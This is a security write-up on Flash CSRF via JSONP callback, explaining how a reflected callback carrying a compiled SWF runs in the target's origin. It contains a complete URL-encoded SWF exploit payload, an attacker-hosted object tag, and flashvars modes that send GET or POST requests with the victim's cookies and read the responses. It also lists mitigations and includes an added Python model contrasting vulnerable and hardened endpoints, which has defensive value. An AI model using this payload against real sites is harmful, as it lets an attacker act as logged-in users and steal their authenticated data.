Flash CSRF via JSONP callback

Cause


When a SWF is loaded through an object tag, Flash Player refuses to load it if the response carries a Content-Disposition header with the value attachment. I have not tested whether there is some whitelist of Content-Type values that Flash requires in order to load; what is clear is that the player does not stop at application/json, the type that today's protagonist, the JSONP endpoint, sends. The player keys on the SWF signature at the start of the body, not on the declared type.

If arbitrary bytes are appended after the end of the SWF (after the last byte of its hex dump), Flash Player still loads it normally. Those two behaviours together give us Flash CSRF via JSONP callback: a JSONP endpoint echoes the callback name at the very beginning of its response, so a callback value that contains a complete SWF places the CWS signature at offset 0 of the body, and the ( ... ) JSON the server appends becomes trailing bytes that the player ignores. Because the SWF is then served from the target's own origin, it runs in that origin's Flash security sandbox: its requests carry the victim's cookies and it is allowed to read the responses, which a plain HTML CSRF cannot do.

Exploitation

Exploit code

Use the following value as the JSONP callback. If the endpoint does not filter, escape or otherwise process the callback parameter, the CSRF succeeds. The value is the URL-encoded byte string of the compiled SWF (note the CWS signature at the start: a zlib-compressed SWF, version 9, with its uncompressed length in the next four bytes); it must be sent as one single query-string value, with a space encoded as + in PHP urlencode style. Any check on the callback that rejects characters outside a small identifier set, or an extra Content-Disposition: attachment header on the response, is enough to stop it.

CWS%09%B2%06%00%00x%9C%7DU%DBR%DBF%18%DE%95VZ%C9gc%23%83%81%60%C0%84%1C%5C%5B%844m%DDC%0E%40R%18%A83%403%BD%B1%A3%B5%BC%B6%D5%C8%92%23%AD%29%DC%F5%0Dz%DD%99%5E%F4%0D%3A%D3%CB%DE%E4%15%9C%5C%E4%0D%DA%D7%A0%2BK%D0%98v%BA%A3%D1%7F%D8%FF%F0%FD%87%91%CE%80%F4%12%80%F4%AF%00%24+%D8%C9%2A%00%80m%E1%E2%E2%E2%CDl%82%B3%10%FC%F9%CB%1F%7F%FD%FC%5Bi%13%807%F9%17r%A0%E1%27%03%AA%01%D9S%18%F5%D9%CB%AEM%12%87%C4rN%AC%01%B5-%87%26%B9%C2%EFW%3B%96%3F%B4%C9%B9z%E8%9EZt%DB%B6%86%B3%97%D6%F5%0F%AD%81%D4%A3%CCb%B2%ED%92%0E%F5%D4%D0%D7%A1L%FD%F6%E8%E0%60%A2C%A7%C4%F3%13%5C%7CA%3C%8B%B4m%EA%2B%26%B1%ED61_AS%3Ef%9E%E5%F4%E4%AEG%06t%13%12q%E4%D9h%E8%FAL%F4%E8%EB%18w%3A%A2%AFG%3C%AFl%F9%1E%25%1D%D1rX%22%CCAO%A9%C3%7Ci7+%CAv%E3%F0%F9%C1%EE%C9n%86t%3A%13%CD%81%E53%EA%F0%E4%01%AET%E4q%C6%A8%E7%10%3B%BB%1B1%7B%0E%A7%5DbR%99%11%8F%97%B1%D2glX%AF%D5H%C7m%D3%AA%E9%0Ej%8F%8F%B7j%F7t%FDA%AD%3D%B2lf9%F1%F0j%C4%2C%DB%CF%85Q%89iR%DF%B7%DA%96m%B1%F3Kl%9E%E7z%7E%D4%C8.%F7%A4%9E%1F%0B%A5%1Eu%07%F1%90%1D%D0%8EE%22lC%DE%05%1E%BF%17%05%F0%CF9%FCA%E4%C28p%25dGV%E4%3BA%10u%FBl%60%17%A6fV%BF%9AY%7EZ%7F%CC%D30Z%9EV%EE%84%B4%D1%FE%9E%9Al%DBu%18%9F.%F5%96%A7%8D%26%AD%22%26%B3Nih%B8%F0%3FA%16%3F%9CP%7D2%8F%E0%9E0%B3O%3D9%B4A%1D%C2%08%0A%16%21n%BA%8E%EF%DA%B4j%BB%3D%EDh%E4%94x%E3%07%C4%E9%94%DCW%15%8F%B2%91%E7%D4%25%9F%91%1E%8D%85%3B%B6%E7t%DD%D8%90%04%0B%13%F4u%E9%1A%D0%27%16%1B%90%E1%8EG%7E%08vmi%0A%CA%DEu%2C%1Dj%BA%1D%9A%F9g%CF%0E%29%EB%BB%1D%F4%BCq%7C%22%0FB%7E%B2w%7C%3BR%7C%B7%9E%06Y%8FM%CF%1A%B2%F4%B5X%C9%A9%16d%FF%D50%ED%BF%FB%2C%873Y%D5%A0%26%CEI%9A%AC%A9%05%A8%CDiK%12%90%80R%D2V%B4UmM%2Bk%EB%DAMmC%BB%A5%DD%D6%EEhw%B5JQ%2A%7ET%AC%16kE%BD%B8Y%BCW%DCR%3EW%BE%10%97U%09%23%25%06%E5x%22%29%A4%D2%99%ECL.%3F%AB%15%C4%B9%F9%E2%C2%E2%D2%8D%E5%94%8A%E4%2B%A1%B4r%17C%01%0B%08%23%CC%BD%B0%14%C3%28%8E%A5%04FI%8CR%18%A5%B1%9C%C1%28%8B%D1%0CF9%8C%F2X%9A%C5H%C3%A8%80%F1%3CFE%8C%160Z%C4%CA%0Du%19%AA%F7%21F%1Fc%F4%29F%9FaT_%100%FA%12K_a%F4%10%A3G%18%DD%C7h%1B%A3-%8Cw%B0%B0%8B%85%A7Xx%86%85%AFe%00%A2%AF%D1%E45u+%14%14%11%A0%B8%08%01D%807%82%1Bc%A0%40+%A8%00%C4%40%1C%021%110%C9%E0%95%0A%5E%E9%E0%A3%96%05%60%26%F0%96+D%90%FB%40%A8%C6%C4%B1%FE%8C%ABD1%16_%1B%EB%A5%1F%A5%F7Mi_%02%9C%BE3r%DD%BC%A14f%85w%CD%CC%DB%FD%0Clh%90%9B%0A%A2%10%8BW%C6%BA%91-%C3%3C%CFb%14%0C%F5mw%AE%3B%DF%28%0AF%A1%F2%A0%F2I%C4%5C%2A%B9%8F%28%C2X%FCw8%D6%5B%09c%A1%BB%D8%5D%AAd%BB7%FA%89%96%1AI%29.%A9%ADd%24%CDp%29%D9JER%8EK%A9Vv%FD%A7o%FAY%23Q%C9%E5w%00h%C9M%BC%8FA_6d%23%D5X%86%ADt3c%249%C4%7E%DAH%1B%A5%EE%0AY%E5T%26k-4%A9%A6%8F%0CtU%0Dg%D3%BC%14%1E%EBq%9E7%A8%C5%EB%E8g%9B%A2%91l%88%81%F2I%1E%03%10%89%1C%3A%0A%A0%A7%C7%FAx%0F4%CBe%60%C4%1B%E5%A0%22I%E0%CD%DB%18%EB%14%18%EB%BAqS76t%E3%96n%DC%D6%8D%3B%BA%21%F0%E7%3B%B0%14%9E%7E%10%E5a%AE%18%0D%F2%F2%1FQ%9D%FAG%3C%E27%7F%03iF%BAw

Exploitation method

Host a page on an origin you control that embeds the JSONP URL as a Flash object, with [code] replaced by the callback value above and the data attribute pointing at the target endpoint. allowscriptaccess="always" is what lets the SWF call back into JavaScript for the read mode.

<object style="height:1px;width:1px;" data="http://localhost/jsonp.php?callback=[code]" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="a=get&url=http://localhost/x.php"></object>

flashvars understood by the SWF:
a=get&url=http://xxxxx  (GET the url, with the victim's cookies)
a=post&url=http://xxxx&post=a=1%26b=2 (POST the given body to the url; note the & inside the body is encoded as %26)
a=read&c=alert&url=http://xxxx (GET the url and pass the response body to the JavaScript function named in c, here alert)
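To check an endpoint's behaviour offline, here is an added example that models the server side of the technique described above. It is not the post's jsonp.php or flashscrf.fla: the endpoint functions (vulnerable_jsonp, hardened_jsonp), the stub SWF and flash_would_load are assumptions of this example, and flash_would_load only encodes the two rules the post states (an attachment disposition blocks loading; Content-Type and trailing bytes are otherwise ignored). The '/**/' prefix in the hardened endpoint is a further mitigation added here, not one the post mentions.

```python
"""Server-side model of the JSONP reflection abused by Flash CSRF via JSONP callback.

Added example, not the post's own code. Endpoint names, the stub SWF and the
loading model are this example's assumptions (see the docstrings below).
"""
import json
import re
import struct
import zlib
from urllib.parse import quote_plus, unquote_to_bytes

SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")
# Conservative callback whitelist: identifier characters only, bounded length.
CALLBACK_RE = re.compile(r"^[A-Za-z0-9_$.]{1,64}$")


def make_stub_swf(version: int = 9) -> bytes:
    """Constructed stand-in for the post's payload: a CWS (zlib-compressed) SWF
    whose movie is empty. It exercises only the header handling; the real
    exploit SWF carries the ActionScript that issues the request."""
    rect = b"\x00"                                   # RECT with Nbits=0
    movie = rect + struct.pack("<HH", 12 << 8, 1)    # 12.0 fps (8.8 fixed), 1 frame
    movie += b"\x00\x00"                             # End tag
    total_len = 8 + len(movie)                       # uncompressed size incl. header
    return b"CWS" + bytes([version]) + struct.pack("<I", total_len) + zlib.compress(movie)


def build_callback_param(swf: bytes) -> str:
    """Percent-encode raw SWF bytes the way the post's payload is encoded
    (PHP urlencode style: space becomes '+')."""
    return quote_plus(swf)


def php_get_param(raw: str) -> bytes:
    """Decode a query value the way PHP fills $_GET: '+' is a space, %XX a byte.
    Returns bytes, not str, because the callback is not text once it is a SWF."""
    return unquote_to_bytes(raw.replace("+", " "))


def vulnerable_jsonp(callback: str, data) -> tuple:
    """The endpoint shape the post attacks: the callback is echoed verbatim at
    offset 0, so an SWF signature inside it lands exactly where Flash Player looks."""
    headers = {"Content-Type": "application/json"}
    body = php_get_param(callback) + b"(" + json.dumps(data).encode() + b")"
    return headers, body


def is_safe_callback(callback: str) -> bool:
    return CALLBACK_RE.match(callback) is not None


def hardened_jsonp(callback: str, data) -> tuple:
    """Same endpoint with the fixes that follow from the post (callback whitelist,
    Content-Disposition: attachment) plus a '/**/' prefix, an assumption added
    here: with it no reflected byte can ever sit at offset 0 of the body."""
    if not is_safe_callback(callback):
        raise ValueError("invalid JSONP callback")
    headers = {"Content-Type": "application/json",
               "Content-Disposition": "attachment"}
    body = b"/**/" + callback.encode("ascii") + b"(" + json.dumps(data).encode() + b")"
    return headers, body


def flash_would_load(headers: dict, body: bytes) -> bool:
    """Model of <object type="application/x-shockwave-flash"> as the post describes
    it: an attachment disposition blocks loading; otherwise Content-Type is
    ignored and only the three signature bytes at offset 0 matter."""
    disposition = headers.get("Content-Disposition", "").split(";")[0].strip().lower()
    if disposition == "attachment":
        return False
    return body[:3] in SWF_MAGICS


def parse_swf(body: bytes):
    """Parse a SWF header leniently and return (version, declared_length,
    movie_bytes, trailing_bytes), or None if there is no signature. For CWS the
    zlib stream is inflated with a decompressobj, so whatever follows the end of
    the stream (here the JSON the endpoint appended) is reported as trailing data."""
    magic = body[:3]
    if magic not in SWF_MAGICS:
        return None
    version = body[3]
    (declared_len,) = struct.unpack("<I", body[4:8])
    if magic == b"CWS":
        d = zlib.decompressobj()
        movie = d.decompress(body[8:])
        trailing = d.unused_data
    elif magic == b"FWS":
        movie, trailing = body[8:declared_len], body[declared_len:]
    else:
        raise NotImplementedError("ZWS (LZMA) is not handled in this example")
    return version, declared_len, movie, trailing


if __name__ == "__main__":
    param = build_callback_param(make_stub_swf())
    h, b = vulnerable_jsonp(param, {"ok": True})
    print("vulnerable endpoint loads as Flash:", flash_would_load(h, b), parse_swf(b)[3])
    h, b = hardened_jsonp("handleData", {"ok": True})
    print("hardened endpoint loads as Flash:", flash_would_load(h, b), b)
```

Running the module shows the vulnerable response starting with CWS and the appended ({"ok": true}) surfacing as ignored trailing data, while the hardened response rejects the SWF-shaped callback outright and, for a legitimate callback, carries no signature at offset 0 and an attachment disposition.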


Screenshot

[Exploitation screenshot]

Source download

flashscrf.fla